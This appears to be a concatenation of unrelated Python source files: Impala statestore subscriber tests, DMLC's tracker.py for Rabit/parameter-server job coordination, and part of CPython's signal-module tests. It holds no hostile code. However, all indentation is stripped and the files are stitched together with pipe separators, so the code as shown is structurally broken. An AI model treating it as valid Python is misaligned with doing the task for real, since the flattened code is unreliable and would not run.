# IMPALA-1891
assert args.topic_deltas[persistent_topic_name].topic_entries[0].deleted == False
if (transient_topic_name in args.topic_deltas and
sub.update_counts[persistent_topic_name] == 1):
assert len(args.topic_deltas[transient_topic_name].topic_entries) == 0
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=persistent_topic_name, is_transient=False),
TTopicRegistration(topic_name=transient_topic_name, is_transient=True)]
sub = StatestoreSubscriber(update_cb=add_entries)
(
sub.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 2)
.wait_for_update(transient_topic_name, 2)
.kill()
.wait_for_failure()
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(persistent_topic_name, 1)
.wait_for_update(transient_topic_name, 1)
)
def test_update_with_clear_entries_flag(self):
"""Test that the statestore clears all topic entries when a subscriber
sets the clear_topic_entries flag in a topic update message (IMPALA-6948)."""
topic_name = "test_topic_%s" % str(uuid.uuid1())
def add_entries(sub, args):
updates = []
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
updates.append(self.make_topic_update(topic_name, num_updates=2,
key_template="old"))
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 2):
updates.append(self.make_topic_update(topic_name, num_updates=1,
key_template="new", clear_topic_entries=True))
if len(updates) > 0:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=updates,
skipped=False)
return DEFAULT_UPDATE_STATE_RESPONSE
def check_entries(sub, args):
if (topic_name in args.topic_deltas and sub.update_counts[topic_name] == 1):
assert len(args.topic_deltas[topic_name].topic_entries) == 1
assert args.topic_deltas[topic_name].topic_entries[0].key == "new0"
return DEFAULT_UPDATE_STATE_RESPONSE
reg = [TTopicRegistration(topic_name=topic_name, is_transient=False)]
sub1 = StatestoreSubscriber(update_cb=add_entries)
(
sub1.start()
.register(topics=reg)
.wait_for_update(topic_name, 1)
.kill()
.wait_for_failure()
.start()
.register(topics=reg)
.wait_for_update(topic_name, 2)
)
sub2 = StatestoreSubscriber(update_cb=check_entries)
(
sub2.start()
.register(topics=reg)
.wait_for_update(topic_name, 2)
)
def test_heartbeat_failure_reset(self):
"""Regression test for IMPALA-6785: the heartbeat failure count for the subscriber ID
should be reset when it resubscribes, not after the first successful heartbeat. Delay
the heartbeat to force the topic update to finish first."""
sub = StatestoreSubscriber(heartbeat_cb=lambda sub, args: time.sleep(0.5))
topic_name = "test_heartbeat_failure_reset"
reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
sub.start()
sub.register(topics=[reg])
LOG.info("Registered with id {0}".format(sub.subscriber_id))
sub.wait_for_heartbeat(1)
sub.kill()
LOG.info("Killed, waiting for statestore to detect failure via heartbeats")
sub.wait_for_failure()
# IMPALA-6785 caused only one topic update to be send. Wait for multiple updates to
# be received to confirm that the subsequent updates are being scheduled repeatedly.
target_updates = sub.update_counts[topic_name] + 5
sub.start()
sub.register(topics=[reg])
LOG.info("Re-registered with id {0}, waiting for update".format(sub.subscriber_id))
sub.wait_for_update(topic_name, target_updates)
def test_min_subscriber_topic_version(self):
self._do_test_min_subscriber_topic_version(False)
def test_min_subscriber_topic_version_with_straggler(self):
self._do_test_min_subscriber_topic_version(True)
def _do_test_min_subscriber_topic_version(self, simulate_straggler):
"""Implementation of test that the 'min_subscriber_topic_version' flag is correctly
set when requested. This tests runs two subscribers concurrently and tracks the
minimum version each has processed. If 'simulate_straggler' is true, one subscriber
rejects updates so that its version is not advanced."""
topic_name = "test_min_subscriber_topic_version_%s" % uuid.uuid1()
# This lock is held while processing the update to protect last_to_versions.
update_lock = threading.Lock()
last_to_versions = {}
TOTAL_SUBSCRIBERS = 2
def callback(sub, args, is_producer, sub_name):
"""Callback for subscriber to verify min_subscriber_topic_version behaviour.
If 'is_producer' is true, this acts as the producer, otherwise it acts as the
consumer. 'sub_name' is a name used to index into last_to_versions."""
if topic_name not in args.topic_deltas:
# The update doesn't contain our topic.
pass
with update_lock:
LOG.info("{0} got update {1}".format(sub_name,
repr(args.topic_deltas[topic_name])))
LOG.info("Versions: {0}".format(last_to_versions))
to_version = args.topic_deltas[topic_name].to_version
from_version = args.topic_deltas[topic_name].from_version
min_subscriber_topic_version = \
args.topic_deltas[topic_name].min_subscriber_topic_version
if is_producer:
assert min_subscriber_topic_version is not None
assert (to_version == 0 and min_subscriber_topic_version == 0) or\
min_subscriber_topic_version < to_version,\
"'to_version' hasn't been created yet by this subscriber."
# Only validate version once all subscribers have processed an update.
if len(last_to_versions) == TOTAL_SUBSCRIBERS:
min_to_version = min(last_to_versions.values())
assert min_subscriber_topic_version <= min_to_version,\
"The minimum subscriber topic version seen by the producer cannot get " +\
"ahead of the minimum version seem by the consumer, by definition."
assert min_subscriber_topic_version >= min_to_version - 2,\
"The min topic version can be two behind the last version seen by " + \
"this subscriber because the updates for both subscribers are " + \
"prepared in parallel and because it's possible that the producer " + \
"processes two updates in-between consumer updates. This is not " + \
"absolute but depends on updates not being delayed a large amount."
else:
# Consumer did not request topic version.
assert min_subscriber_topic_version is None
# Check the 'to_version' and update 'last_to_versions'.
last_to_version = last_to_versions.get(sub_name, 0)
if to_version > 0:
# Non-empty update.
assert from_version == last_to_version
# Stragglers should accept the first update then skip later ones.
skip_update = simulate_straggler and not is_producer and last_to_version > 0
if not skip_update: last_to_versions[sub_name] = to_version
if is_producer:
delta = self.make_topic_update(topic_name)
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[delta],
skipped=False)
elif skip_update:
return TUpdateStateResponse(status=STATUS_OK, topic_updates=[], skipped=True)
else:
return DEFAULT_UPDATE_STATE_RESPONSE
# Two concurrent subscribers, which pushes out updates and checks the minimum
# version, the other which just consumes the updates.
def producer_callback(sub, args): return callback(sub, args, True, "producer")
def consumer_callback(sub, args): return callback(sub, args, False, "consumer")
consumer_sub = StatestoreSubscriber(update_cb=consumer_callback)
consumer_reg = TTopicRegistration(topic_name=topic_name, is_transient=True)
producer_sub = StatestoreSubscriber(update_cb=producer_callback)
producer_reg = TTopicRegistration(topic_name=topic_name, is_transient=True,
populate_min_subscriber_topic_version=True)
NUM_UPDATES = 6
(
consumer_sub.start()
.register(topics=[consumer_reg])
)
(
producer_sub.start()
.register(topics=[producer_reg])
.wait_for_update(topic_name, NUM_UPDATES)
)
consumer_sub.wait_for_update(topic_name, NUM_UPDATES)
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
from requests import get
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
logging.debug("Created SlaveEntry for node: %s" % self.host)
magic = slave.recvint()
assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
# send the rprev and next link
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
# all connection was successuly setup
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
def slave_envs(self):
"""
get enviroment variables for slaves
can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def get_star(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = [0] if r != 0 else [worker for worker in range(1, nslave)]
parent_map[r] = 0 if r != 0 else -1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
get the link map, this is a bit hacky, call for better algorithm
to place similar nodes together
"""
tree_map, parent_map = self.get_star(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
# set of nodes that finishs the job
shutdown = {}
# set of nodes that is waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
# list of workers that is pending to be assigned rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
# set of nodes that is pending for getting up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.debug('Recieve %s signal from %s; assign rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
logging.debug('Recieve %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
while self.thread.isAlive():
self.thread.join(100)
def alive(self):
return self.thread.isAlive()
class PSTracker(object):
"""
Tracker module for PS
"""
def __init__(self, hostIP, cmd, port=9091, port_end=9999, envs=None):
"""
Starts the PS scheduler
"""
self.cmd = cmd
if cmd is None:
return
envs = {} if envs is None else envs
self.hostIP = hostIP
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind(('', port))
self.port = port
sock.close()
break
except socket.error:
continue
env = os.environ.copy()
env['DMLC_ROLE'] = 'scheduler'
env['DMLC_PS_ROOT_URI'] = str(self.hostIP)
env['DMLC_PS_ROOT_PORT'] = str(self.port)
for k, v in envs.items():
env[k] = str(v)
self.thread = Thread(
target=(lambda: subprocess.check_call(self.cmd, env=env, shell=True, executable='/bin/bash')), args=())
self.thread.setDaemon(True)
self.thread.start()
def join(self):
if self.cmd is not None:
while self.thread.isAlive():
self.thread.join(100)
def slave_envs(self):
if self.cmd is None:
return {}
else:
return {'DMLC_PS_ROOT_URI': self.hostIP,
'DMLC_PS_ROOT_PORT': self.port}
def alive(self):
if self.cmd is not None:
return self.thread.isAlive()
else:
return False
def get_host_ip(hostIP=None):
if hostIP is None or hostIP == 'auto':
hostIP = 'ip'
if hostIP == 'dns':
hostIP = socket.getfqdn()
elif hostIP == 'ip':
from socket import gaierror
try:
hostIP = socket.gethostbyname(socket.getfqdn())
except gaierror:
logging.warn('gethostbyname(socket.getfqdn()) failed... trying on hostname()')
hostIP = socket.gethostbyname(socket.gethostname())
if hostIP.startswith("127."):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# doesn't have to be reachable
s.connect(('10.255.255.255', 1))
hostIP = s.getsockname()[0]
return hostIP
def submit(nworker, nserver, fun_submit, hostIP='auto', pscmd=None):
if nserver == 0:
pscmd = None
envs = {'DMLC_NUM_WORKER' : nworker,
'DMLC_NUM_SERVER' : nserver}
hostIP = get_host_ip(hostIP)
if nserver == 0:
rabit = RabitTracker(hostIP=hostIP, nslave=nworker)
envs.update(rabit.slave_envs())
rabit.start(nworker)
if rabit.alive():
fun_submit(nworker, nserver, envs)
else:
pserver = PSTracker(hostIP=hostIP, cmd=pscmd, envs=envs)
envs.update(pserver.slave_envs())
if pserver.alive():
fun_submit(nworker, nserver, envs)
if nserver == 0:
rabit.join()
else:
pserver.join()
def start_rabit_tracker(args):
"""Standalone function to start rabit tracker.
Parameters
----------
args: arguments to start the rabit tracker.
"""
envs = {'DMLC_NUM_WORKER' : args.num_workers,
'DMLC_NUM_SERVER' : args.num_servers}
rabit = RabitTracker(hostIP=get_host_ip(args.host_ip), nslave=args.num_workers)
envs.update(rabit.slave_envs())
rabit.start(args.num_workers)
sys.stdout.write('DMLC_TRACKER_ENV_START\n')
# simply write configuration to stdout
for k, v in envs.items():
sys.stdout.write('%s=%s\n' % (k, str(v)))
sys.stdout.write('DMLC_TRACKER_ENV_END\n')
sys.stdout.flush()
rabit.join()
def main():
"""Main function if tracker is executed in standalone mode."""
parser = argparse.ArgumentParser(description='Rabit Tracker start.')
parser.add_argument('--num-workers', required=True, type=int,
help='Number of worker proccess to be launched.')
parser.add_argument('--num-servers', default=0, type=int,
help='Number of server process to be launched. Only used in PS jobs.')
parser.add_argument('--host-ip', default=None, type=str,
help=('Host IP addressed, this is only needed ' +
'if the host IP cannot be automatically guessed.'))
parser.add_argument('--log-level', default='INFO', type=str,
choices=['INFO', 'DEBUG'],
help='Logging level of the logger.')
args = parser.parse_args()
fmt = '%(asctime)s %(levelname)s %(message)s'
if args.log_level == 'INFO':
level = logging.INFO
elif args.log_level == 'DEBUG':
level = logging.DEBUG
else:
raise RuntimeError("Unknown logging level %s" % args.log_level)
logging.basicConfig(format=fmt, level=level)
if args.num_servers == 0:
start_rabit_tracker(args)
else:
raise RuntimeError("Do not yet support start ps tracker in standalone mode.")
if __name__ == "__main__":
main()
|
test_signal.py
|
import os
import random
import signal
import socket
import statistics
import subprocess
import sys
import threading
import time
import unittest
from test import support
from test.support.script_helper import assert_python_ok, spawn_python
try:
import _testcapi
except ImportError:
_testcapi = None
class GenericTests(unittest.TestCase):
def test_enums(self):
for name in dir(signal):
sig = getattr(signal, name)
if name in {'SIG_DFL', 'SIG_IGN'}:
self.assertIsInstance(sig, signal.Handlers)
elif name in {'SIG_BLOCK', 'SIG_UNBLOCK', 'SIG_SETMASK'}:
self.assertIsInstance(sig, signal.Sigmasks)
elif name.startswith('SIG') and not name.startswith('SIG_'):
self.assertIsInstance(sig, signal.Signals)
elif name.startswith('CTRL_'):
self.assertIsInstance(sig, signal.Signals)
self.assertEqual(sys.platform, "win32")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class PosixTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
self.assertRaises(ValueError, signal.strsignal, 4242)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertIsInstance(hup, signal.Handlers)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
def test_strsignal(self):
self.assertIn("Interrupt", signal.strsignal(signal.SIGINT))
self.assertIn("Terminated", signal.strsignal(signal.SIGTERM))
self.assertIn("Hangup", signal.strsignal(signal.SIGHUP))
# Issue 3864, unknown if this affects earlier versions of freebsd also
def test_interprocess_signal(self):
dirname = os.path.dirname(__file__)
script = os.path.join(dirname, 'signalinterproctester.py')
assert_python_ok(script)
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertIn(signal.Signals.SIGINT, s)
self.assertIn(signal.Signals.SIGALRM, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_valid_signals(self):
s = signal.valid_signals()
self.assertIsInstance(s, set)
self.assertGreaterEqual(len(s), 6)
self.assertIn(signal.Signals.SIGINT, s)
self.assertNotIn(0, s)
self.assertNotIn(signal.NSIG, s)
self.assertLess(len(s), signal.NSIG)
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
checked = set()
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows.
# Issue #18396, only for signals without a C-level handler.
if signal.getsignal(sig) is not None:
signal.signal(sig, signal.signal(sig, handler))
checked.add(sig)
# Issue #18396: Ensure the above loop at least tested *something*
self.assertTrue(checked)
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
class WakeupFDTests(unittest.TestCase):
def test_invalid_call(self):
# First parameter is positional-only
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signum=signal.SIGINT)
# warn_on_full_buffer is a keyword-only parameter
with self.assertRaises(TypeError):
signal.set_wakeup_fd(signal.SIGINT, False)
def test_invalid_fd(self):
fd = support.make_bad_fd()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_invalid_socket(self):
sock = socket.socket()
fd = sock.fileno()
sock.close()
self.assertRaises((ValueError, OSError),
signal.set_wakeup_fd, fd)
def test_set_wakeup_fd_result(self):
r1, w1 = os.pipe()
self.addCleanup(os.close, r1)
self.addCleanup(os.close, w1)
r2, w2 = os.pipe()
self.addCleanup(os.close, r2)
self.addCleanup(os.close, w2)
if hasattr(os, 'set_blocking'):
os.set_blocking(w1, False)
os.set_blocking(w2, False)
signal.set_wakeup_fd(w1)
self.assertEqual(signal.set_wakeup_fd(w2), w1)
self.assertEqual(signal.set_wakeup_fd(-1), w2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
def test_set_wakeup_fd_socket_result(self):
sock1 = socket.socket()
self.addCleanup(sock1.close)
sock1.setblocking(False)
fd1 = sock1.fileno()
sock2 = socket.socket()
self.addCleanup(sock2.close)
sock2.setblocking(False)
fd2 = sock2.fileno()
signal.set_wakeup_fd(fd1)
self.assertEqual(signal.set_wakeup_fd(fd2), fd1)
self.assertEqual(signal.set_wakeup_fd(-1), fd2)
self.assertEqual(signal.set_wakeup_fd(-1), -1)
# On Windows, files are always blocking and Windows does not provide a
# function to test if a socket is in non-blocking mode.
@unittest.skipIf(sys.platform == "win32", "tests specific to POSIX")
def test_set_wakeup_fd_blocking(self):
rfd, wfd = os.pipe()
self.addCleanup(os.close, rfd)
self.addCleanup(os.close, wfd)
# fd must be non-blocking
os.set_blocking(wfd, True)
with self.assertRaises(ValueError) as cm:
signal.set_wakeup_fd(wfd)
self.assertEqual(str(cm.exception),
"the fd %s must be in non-blocking mode" % wfd)
# non-blocking is ok
os.set_blocking(wfd, False)
signal.set_wakeup_fd(wfd)
signal.set_wakeup_fd(-1)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def check_wakeup(self, test_body, *signals, ordered=True):
# use a subprocess to have only one thread
code = """if 1:
import _testcapi
import os
import signal
import struct
signals = {!r}
def handler(signum, frame):
pass
def check_signum(signals):
data = os.read(read, len(signals)+1)
raised = struct.unpack('%uB' % len(data), data)
if not {!r}:
raised = set(raised)
signals = set(signals)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
os.set_blocking(write, False)
signal.set_wakeup_fd(write)
test()
check_signum(signals)
os.close(read)
os.close(write)
""".format(tuple(map(int, signals)), ordered, test_body)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_wakeup_write_error(self):
# Issue #16105: write() errors in the C signal handler should not
# pass silently.
# Use a subprocess to have only one thread.
code = """if 1:
import _testcapi
import errno
import os
import signal
import sys
from test.support import captured_stderr
def handler(signum, frame):
1/0
signal.signal(signal.SIGALRM, handler)
r, w = os.pipe()
os.set_blocking(r, False)
# Set wakeup_fd a read-only file descriptor to trigger the error
signal.set_wakeup_fd(r)
try:
with captured_stderr() as err:
_testcapi.raise_signal(signal.SIGALRM)
except ZeroDivisionError:
# An ignored exception should have been printed out on stderr
err = err.getvalue()
if ('Exception ignored when trying to write to the signal wakeup fd'
not in err):
raise AssertionError(err)
if ('OSError: [Errno %d]' % errno.EBADF) not in err:
raise AssertionError(err)
else:
raise AssertionError("ZeroDivisionError not raised")
os.close(r)
os.close(w)
"""
r, w = os.pipe()
try:
os.write(r, b'x')
except OSError:
pass
else:
self.skipTest("OS doesn't report write() error on the read end of a pipe")
finally:
os.close(r)
os.close(w)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
# We attempt to get a signal during the sleep,
# before select is called
try:
select.select([], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
before_time = time.monotonic()
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
class InterruptSelect(Exception):
pass
def handler(signum, frame):
raise InterruptSelect
signal.signal(signal.SIGALRM, handler)
signal.alarm(1)
before_time = time.monotonic()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except InterruptSelect:
pass
else:
raise Exception("select() was not interrupted")
after_time = time.monotonic()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""", signal.SIGALRM)
def test_signum(self):
self.check_wakeup("""def test():
import _testcapi
signal.signal(signal.SIGUSR1, handler)
_testcapi.raise_signal(signal.SIGUSR1)
_testcapi.raise_signal(signal.SIGALRM)
""", signal.SIGUSR1, signal.SIGALRM)
@unittest.skipUnless(hasattr(signal, 'pthread_sigmask'),
'need signal.pthread_sigmask()')
def test_pending(self):
self.check_wakeup("""def test():
signum1 = signal.SIGUSR1
signum2 = signal.SIGUSR2
signal.signal(signum1, handler)
signal.signal(signum2, handler)
signal.pthread_sigmask(signal.SIG_BLOCK, (signum1, signum2))
_testcapi.raise_signal(signum1)
_testcapi.raise_signal(signum2)
# Unblocking the 2 signals calls the C signal handler twice
signal.pthread_sigmask(signal.SIG_UNBLOCK, (signum1, signum2))
""", signal.SIGUSR1, signal.SIGUSR2, ordered=False)
@unittest.skipUnless(hasattr(socket, 'socketpair'), 'need socket.socketpair')
class WakeupSocketSignalTests(unittest.TestCase):
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_socket(self):
# use a subprocess to have only one thread
code = """if 1:
import signal
import socket
import struct
import _testcapi
signum = signal.SIGINT
signals = (signum,)
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
_testcapi.raise_signal(signum)
data = read.recv(1)
if not data:
raise Exception("no signum written")
raised = struct.unpack('B', data)
if raised != signals:
raise Exception("%r != %r" % (raised, signals))
read.close()
write.close()
"""
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_send_error(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
read.setblocking(False)
write.setblocking(False)
signal.set_wakeup_fd(write.fileno())
# Close sockets: send() will fail
read.close()
write.close()
with captured_stderr() as err:
_testcapi.raise_signal(signum)
err = err.getvalue()
if ('Exception ignored when trying to {action} to the signal wakeup fd'
not in err):
raise AssertionError(err)
""".format(action=action)
assert_python_ok('-c', code)
@unittest.skipIf(_testcapi is None, 'need _testcapi')
def test_warn_on_full_buffer(self):
# Use a subprocess to have only one thread.
if os.name == 'nt':
action = 'send'
else:
action = 'write'
code = """if 1:
import errno
import signal
import socket
import sys
import time
import _testcapi
from test.support import captured_stderr
signum = signal.SIGINT
# This handler will be called, but we intentionally won't read from
# the wakeup fd.
def handler(signum, frame):
pass
signal.signal(signum, handler)
read, write = socket.socketpair()
# Fill the socketpair buffer
if sys.platform == 'win32':
# bpo-34130: On Windows, sometimes non-blocking send fails to fill
# the full socketpair buffer, so use a timeout of 50 ms instead.
write.settimeout(0.050)
else:
write.setblocking(False)
# Start with large chunk size to reduce the
# number of send needed to fill the buffer.
written = 0
for chunk_size in (2 ** 16, 2 ** 8, 1):
chunk = b"x" * chunk_size
try:
while True:
write.send(chunk)
written += chunk_size
except (BlockingIOError, socket.timeout):
pass
print(f"%s bytes written into the socketpair" % written, flush=True)
write.setblocking(False)
try:
write.send(b"x")
except BlockingIOError:
# The socketpair buffer seems full
pass
else:
